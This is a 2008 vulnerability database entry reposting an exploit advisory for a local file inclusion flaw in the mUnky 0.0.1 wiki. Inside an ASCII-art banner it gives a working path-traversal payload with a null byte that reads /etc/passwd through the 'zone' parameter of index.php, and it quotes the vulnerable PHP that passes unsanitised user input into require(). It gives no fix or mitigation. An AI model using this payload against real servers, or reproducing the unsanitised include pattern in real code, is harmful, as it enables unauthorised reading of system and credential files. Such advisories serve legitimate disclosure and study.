mUnky 0.0.1 (index.php zone) Local File Inclusion Vulnerability

2008-06-28T00:00:00
ID SSV:8843
Type seebug
Reporter Root
Modified 2008-06-28T00:00:00

Description

No description provided by source.

                                        
                                            
                                                [*]================================================================================[*]
 |             _____ _     _         _   _____                                      |
 |            |_   _| |__ (_)_ __ __| | | ____|   _  ___                            |
 |              | | | '_ \| | '__/ _` | |  _|| | | |/ _ \                           |
 |              | | | | | | | | | (_| | | |__| |_| |  __/                           | 
 |              |_| |_| |_|_|_|  \__,_| |_____\__, |\___|                           |
 |                                            |___/                                 |
 |              ____                       _ _                                      | 
 |             / ___|  ___  ___ _   _ _ __(_) |_ _   _                              |
 |             \___ \ / _ \/ __| | | | '__| | __| | | |                             |
 |              ___) |  __/ (__| |_| | |  | | |_| |_| |                             |
 |             |____/ \___|\___|\__,_|_|  |_|\__|\__, |                             |
 |                                               |___/                              |
[*]================================================================================[*]
 |  Author: StAkeR ~ StAkeR@hotmail.it                                              |
[*]================================================================================[*]
 |  mUnky 0.0.1 <= Local File Inclusion Vulnerability                               |
[*]================================================================================[*]
 |  Get => http://dfn.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz |
[*]================================================================================[*]
 |   index.php?zone=../../../../../../../../../etc/passwd%00                        |
[*]================================================================================[*]
 |                                                                                  |
 | //Check if zone is set                                                           |
 |  if(!isset($_GET['zone']))                                                       |
 |   {                                                                              |
 |       $zone = "home";                                                            |
 |   }                                                                              |
 |   else{                                                                          |       
 |       $zone = $_GET['zone'];                                                     |
 |}                                                                                 |
 | //Check for the desired page                                                     |
 | if(file_exists("zone/$zone.php"))                                                | 
 | {                                                                                |
 |      require("zone/$zone.php");                                                  |
 | }                                                                                |
[*]================================================================================[*]